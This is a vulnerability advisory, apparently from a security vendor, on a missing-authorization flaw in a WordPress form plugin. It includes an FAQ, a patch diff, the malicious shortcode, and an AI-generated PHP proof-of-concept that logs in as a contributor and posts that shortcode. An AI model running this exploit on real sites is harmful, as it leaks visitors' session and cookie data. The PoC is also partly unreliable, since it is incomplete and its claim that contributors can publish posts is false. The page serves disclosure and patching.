What is CVE-2026-25368?

CVE-2026-25368 is a medium severity vulnerability in the Calculated Fields Form plugin for WordPress, affecting versions up to and including 5.4.4.1. It is caused by a missing authorization check that allows authenticated users with contributor-level access or higher to perform unauthorized actions.

How does this vulnerability work?

The vulnerability allows attackers to read arbitrary data from the PHP superglobal arrays $_SESSION and $_COOKIE by using a specific shortcode. By crafting a post with this shortcode, an attacker can expose sensitive session or cookie data to themselves.

Who is affected by this vulnerability?

Any WordPress site using the Calculated Fields Form plugin version 5.4.4.1 or earlier is vulnerable. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the plugins section of your WordPress admin panel and locate the Calculated Fields Form plugin. Verify the version number; if it is 5.4.4.1 or lower, your site is affected.

How can I fix this vulnerability?

The issue is resolved in version 5.4.4.2 of the Calculated Fields Form plugin. Administrators should update the plugin immediately to this patched version to mitigate the risk.

What does a CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to information disclosure or other attacks if exploited.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can lead to unauthorized access to sensitive data stored in a user’s session or cookies, which may include authentication tokens or user identifiers. While it does not allow for privilege escalation, it could facilitate session hijacking or other attacks.

What are the technical details of the vulnerability?

The vulnerability arises from insufficient capability checks in the cpcff_get_variable function, which processes the ‘from’ attribute of a shortcode. The original code allowed reading from $_SESSION and $_COOKIE without verifying user permissions, leading to unauthorized data exposure.

How does the proof of concept demonstrate the issue?

The proof of concept provided shows how an authenticated user can log into a vulnerable WordPress site and create a post containing the malicious shortcode. When the post is accessed, it triggers the vulnerability, allowing the attacker to read sensitive session data.

What steps should I take if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the Calculated Fields Form plugin until it can be updated. Additionally, review user permissions and restrict access to contributor-level users to minimize the risk of exploitation.

Are there any other security best practices to follow?

In addition to updating vulnerable plugins, regularly review and update all WordPress plugins and themes, implement strong user access controls, and monitor for unusual activity on your site. Keeping backups and using security plugins can also help mitigate risks.

Where can I find more information about this vulnerability?

More information about CVE-2026-25368 can be found on the official CVE database, security advisories from the plugin developers, and various cybersecurity blogs that cover WordPress vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-25368: Calculated Fields Form <= 5.4.4.1 – Missing Authorization (calculated-fields-form)

CVE ID CVE-2026-25368

Plugin calculated-fields-form

Severity Medium (CVSS 4.3)

CWE 862

Vulnerable Version 5.4.4.1

Patched Version 5.4.4.2

Disclosed February 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-25368:
The Calculated Fields Form plugin for WordPress, versions up to and including 5.4.4.1, contains a missing authorization vulnerability. This flaw allows authenticated attackers with contributor-level permissions or higher to perform an unauthorized action, specifically to read arbitrary data from the `$_SESSION` and `$_COOKIE` superglobal arrays. The CVSS score of 4.3 reflects a medium severity issue.

The root cause is an insufficient capability check in the `cpcff_get_variable` function, which handles the `[CP_CALCULATED_FIELDS_VAR]` shortcode. The vulnerable code path is in the file `/calculated-fields-form/inc/cpcff_main.inc.php` between lines 870 and 890. The function processes the `from` attribute to determine which superglobal array to read from. The original code allowed the `from` parameter to specify `_SESSION` or `_COOKIE`, and subsequently read data from those arrays without verifying if the current user had the right to access that data.

An attacker can exploit this by crafting a post or page containing the malicious shortcode `[CP_CALCULATED_FIELDS_VAR var=”target_variable” from=”_SESSION”]`. As a contributor, the attacker can publish this post. When the post is viewed, the plugin executes the shortcode handler, reading the value of the specified variable from the visitor’s session or cookie data and outputting it as a JSON-encoded string within the page content. This results in the exposure of that data to the attacker.

The patch in version 5.4.4.2 modifies the `cpcff_get_variable` function in `/calculated-fields-form/inc/cpcff_main.inc.php`. It removes `_SESSION` and `_COOKIE` from the allowed values for the `from` attribute array on line 873. The patch also removes the corresponding fallback logic that directly accessed `$_SESSION` and `$_COOKIE` on lines 883-886. After the patch, the function can only read data from `_POST` or `_GET` superglobals, which are inherently user-supplied and transient, thereby eliminating the unauthorized data leak from server-side session stores or client cookies.

Successful exploitation leads to information disclosure. An attacker can extract sensitive data stored in a user’s PHP session, which may include authentication tokens, user identifiers, or other temporary application state. Accessing `$_COOKIE` data could expose persistent identifiers or other client-stored information. This vulnerability does not directly allow privilege escalation or remote code execution, but the leaked session data could facilitate other attacks like session hijacking.

Differential between vulnerable and patched code

Code Diff

--- a/calculated-fields-form/cp_calculatedfieldsf_free.php
+++ b/calculated-fields-form/cp_calculatedfieldsf_free.php
@@ -3,7 +3,7 @@
  * Plugin Name: Calculated Fields Form
  * Plugin URI: https://cff.dwbooster.com
  * Description: Create forms with field values calculated based in other form field values.
- * Version: 5.4.4.1
+ * Version: 5.4.4.2
  * Text Domain: calculated-fields-form
  * Author: CodePeople
  * Author URI: https://cff.dwbooster.com
@@ -25,7 +25,7 @@
 }

 // Defining main constants.
-define( 'CP_CALCULATEDFIELDSF_VERSION', '5.4.4.1' );
+define( 'CP_CALCULATEDFIELDSF_VERSION', '5.4.4.2' );
 define( 'CP_CALCULATEDFIELDSF_MAIN_FILE_PATH', __FILE__ );
 define( 'CP_CALCULATEDFIELDSF_BASE_PATH', dirname( CP_CALCULATEDFIELDSF_MAIN_FILE_PATH ) );
 define( 'CP_CALCULATEDFIELDSF_BASE_NAME', plugin_basename( CP_CALCULATEDFIELDSF_MAIN_FILE_PATH ) );
--- a/calculated-fields-form/inc/cpcff_main.inc.php
+++ b/calculated-fields-form/inc/cpcff_main.inc.php
@@ -870,7 +870,7 @@
 					if ( isset( $atts['from'] ) ) {
 						$from .= strtoupper( trim( $atts['from'] ) );
 					}
-					if ( in_array( $from, array( '_POST', '_GET', '_SESSION', '_COOKIE' ) ) ) {
+					if ( in_array( $from, array( '_POST', '_GET' ) ) ) {
 						if ( isset( $GLOBALS[ $from ][ $var ] ) ) {
 							$value = json_encode( $GLOBALS[ $from ][ $var ] );
 						} elseif ( isset( $atts['default_value'] ) ) {
@@ -880,10 +880,6 @@
 						$value = json_encode( CPCFF_AUXILIARY::sanitize( $_POST[ $var ] ) ); // phpcs:ignore
 					} elseif ( isset( $_GET[ $var ] ) ) {
 						$value = json_encode( CPCFF_AUXILIARY::sanitize( $_GET[ $var ] ) ); // phpcs:ignore
-					} elseif ( isset( $_SESSION[ $var ] ) ) {
-						$value = json_encode( CPCFF_AUXILIARY::sanitize( $_SESSION[ $var ] ) ); // phpcs:ignore
-					} elseif ( isset( $_COOKIE[ $var ] ) ) {
-						$value = json_encode( CPCFF_AUXILIARY::sanitize( $_COOKIE[ $var ] ) ); // phpcs:ignore
 					} elseif ( isset( $atts['default_value'] ) ) {
 						$value = json_encode( CPCFF_AUXILIARY::sanitize( $atts['default_value'] ) ); // phpcs:ignore
 					}

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-25368 - Calculated Fields Form <= 5.4.4.1 - Missing Authorization
<?php

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_pass';

// Initialize cURL session for WordPress login
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
)));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt'); // Save login cookies
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

$login_response = curl_exec($ch);

// Check if login was successful by attempting to access the post creation page
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_POST, false);
$post_page = curl_exec($ch);

if (strpos($post_page, 'Welcome to the Block Editor') === false) {
    die('Login failed. Check credentials.');
}

// Extract the nonce required for creating a post (simplified example; real implementation may need to parse the page for _wpnonce)
// This PoC assumes the contributor can create a post. The exploit shortcode will be inserted into the post content.
$post_content = 'Exploit shortcode to leak SESSION data: [CP_CALCULATED_FIELDS_VAR var="user_login" from="_SESSION"]';
$post_title = 'Test Post - CVE-2026-25368';

// Prepare POST data to create a new post with the malicious shortcode
$post_data = array(
    'post_title' => $post_title,
    'content' => $post_content,
    'post_status' => 'publish', // Contributor can publish their own posts
    '_wpnonce' => 'NONCE_PLACEHOLDER', // This must be extracted from the page in a real scenario
    'post_type' => 'post',
    'action' => 'editpost'
);

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));

$create_response = curl_exec($ch);

// If post creation is successful, retrieve the post URL to view it and trigger the shortcode execution.
// In a real test, you would parse the response to get the new post's permalink.
// For this PoC, we output the response which may contain the leaked data if the shortcode executed.
echo "Post creation response (check for JSON output of session data):n";
echo $create_response;

curl_close($ch);

// Note: A fully automated PoC would require parsing the admin page for a valid nonce and the resulting post ID.
// This script demonstrates the attack flow: authenticate, create a post with the malicious shortcode, and publish it.
?>

Frequently Asked Questions

What is CVE-2026-25368?
Overview of the vulnerability
CVE-2026-25368 is a medium severity vulnerability in the Calculated Fields Form plugin for WordPress, affecting versions up to and including 5.4.4.1. It is caused by a missing authorization check that allows authenticated users with contributor-level access or higher to perform unauthorized actions.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to read arbitrary data from the PHP superglobal arrays $_SESSION and $_COOKIE by using a specific shortcode. By crafting a post with this shortcode, an attacker can expose sensitive session or cookie data to themselves.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Calculated Fields Form plugin version 5.4.4.1 or earlier is vulnerable. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Version verification steps
To check if your site is vulnerable, navigate to the plugins section of your WordPress admin panel and locate the Calculated Fields Form plugin. Verify the version number; if it is 5.4.4.1 or lower, your site is affected.
How can I fix this vulnerability?
Updating the plugin
The issue is resolved in version 5.4.4.2 of the Calculated Fields Form plugin. Administrators should update the plugin immediately to this patched version to mitigate the risk.
What does a CVSS score of 4.3 mean?
Understanding severity ratings
A CVSS score of 4.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to information disclosure or other attacks if exploited.
What are the practical risks of this vulnerability?
Potential impacts on security
Exploitation of this vulnerability can lead to unauthorized access to sensitive data stored in a user’s session or cookies, which may include authentication tokens or user identifiers. While it does not allow for privilege escalation, it could facilitate session hijacking or other attacks.
What are the technical details of the vulnerability?
Code and function analysis
The vulnerability arises from insufficient capability checks in the cpcff_get_variable function, which processes the ‘from’ attribute of a shortcode. The original code allowed reading from $_SESSION and $_COOKIE without verifying user permissions, leading to unauthorized data exposure.
How does the proof of concept demonstrate the issue?
Example of exploitation
The proof of concept provided shows how an authenticated user can log into a vulnerable WordPress site and create a post containing the malicious shortcode. When the post is accessed, it triggers the vulnerability, allowing the attacker to read sensitive session data.
What steps should I take if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider disabling the Calculated Fields Form plugin until it can be updated. Additionally, review user permissions and restrict access to contributor-level users to minimize the risk of exploitation.
Are there any other security best practices to follow?
Enhancing overall security
In addition to updating vulnerable plugins, regularly review and update all WordPress plugins and themes, implement strong user access controls, and monitor for unusual activity on your site. Keeping backups and using security plugins can also help mitigate risks.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-25368 can be found on the official CVE database, security advisories from the plugin developers, and various cybersecurity blogs that cover WordPress vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations